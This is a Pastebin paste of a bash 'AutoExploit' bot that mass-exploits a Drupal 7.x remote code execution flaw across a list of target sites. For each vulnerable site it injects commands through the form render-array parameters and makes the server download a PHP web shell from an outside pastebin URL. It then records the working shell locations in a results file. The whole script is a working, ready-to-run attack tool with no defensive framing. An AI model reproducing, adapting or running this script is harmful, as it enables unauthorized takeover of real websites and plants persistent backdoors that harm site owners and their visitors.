API tools faq
paste
rootasuna

RCE DRUPAL

rootasuna
Apr 25th, 2018
280
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 2.94 KB | None | 0 0
raw download clone embed print report
  1. #!/bin/bash
  2. # AutoExploit [BOT]
  3. # Remote Code Execute CMS Drupal 7.x
  4. # Date : 22 - Apr - 2018
  5. # Usage : ./rce.sh list.txt
  6. # Coded by ZeroByte.ID
  7. cekrce() {
  8. target=$1
  9. echo -ne "---";
  10. cek=$(curl -s -X POST --cookie-jar cookie.tmp "${target}/?q=user/password&name\[%23post_render\]\[\]=passthru&name\[%23type\]=markup&name\[%23markup\]=uname+-a" --data "form_id=user_pass&_triggering_element_name=name" | grep form_build_id);
  11. echo -ne "-------";
  12. if [[ $cek =~ 'value="form-' ]]; then
  13. echo -ne "--------------------------";
  14. token=$(curl -s -X POST -b cookie.tmp "${target}/?q=user/password&name\[%23post_render\]\[\]=passthru&name\[%23type\]=markup&name\[%23markup\]=uname+-a" --data "form_id=user_pass&_triggering_element_name=name" | grep form_build_id | grep -Po '(?<=value=")[^" \>]*' | head -1);
  15. echo -ne "----------------------------------";
  16. echo
  17. result=$(curl -s -X POST -b cookie.tmp "${target}/?q=file/ajax/name/%23value/${token}" --data "form_build_id=${token}" | head -1)
  18. if [[ $result =~ 'Linux' ]]; then
  19. echo "[O] VULN RCE $target : uname -a"
  20. echo "$result";
  21. echo "Proses Upload Shell ....."
  22. upload=$(curl -s -X POST -b cookie.tmp "${target}/?q=user/password&name\[%23post_render\]\[\]=passthru&name\[%23type\]=markup&name\[%23markup\]=curl+-o+sites/default/files/zb.php+"https://pastebin.com/raw/qwck7PrC"" --data "form_id=user_pass&_triggering_element_name=name" | grep form_build_id | grep -Po '(?<=value=")[^" \>]*' | head -1);
  23. curl -s -X POST -b cookie.tmp "${target}/?q=file/ajax/name/%23value/${upload}" --data "form_build_id=${upload}" | head -1 > /dev/null
  24. cekshell=$(curl -s "${target}/sites/default/files/zb.php");
  25. if [[ $cekshell =~ 'ZeroByte.ID' ]]; then
  26. echo "Upload Done"
  27. echo "$result" >> result.txt
  28. echo "$target/sites/default/files/zb.php" | tee -a result.txt
  29. echo "=====================================" >> result.txt
  30. else
  31. echo "Can't Upload"
  32. echo "$target" >> gagal-upload.txt
  33. fi
  34. echo "--------------------------------------------------------------------------"
  35. else
  36. echo "[X] NOT VULN $target"
  37.  
  38. fi
  39. else
  40. echo
  41. echo "[X] NOT VULN $target";
  42. fi
  43. }
  44.  
  45. cat << "banner"
  46. --------------------------------------------------
  47. _ _ _ _
  48. _______ _ __ ___ | |__ _ _| |_ ___ (_) __| |
  49. |_ / _ \ '__/ _ \| '_ \| | | | __/ _ \ | |/ _` |
  50. / / __/ | | (_) | |_) | |_| | || __/_| | (_| |
  51. /___\___|_| \___/|_.__/ \__, |\__\___(_)_|\__,_|
  52. |___/
  53. DayWalker
  54. ----------------[ RCE Drupal 7.x ]----------------
  55.  
  56. banner
  57.  
  58. for s in $(cat $1); do
  59. echo "CHECKING $s"
  60. echo -ne "----";
  61. cekrce $s
  62. done
  63. rm cookie.tmp
Add Comment
Please, Sign In to add comment
Public Pastes
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!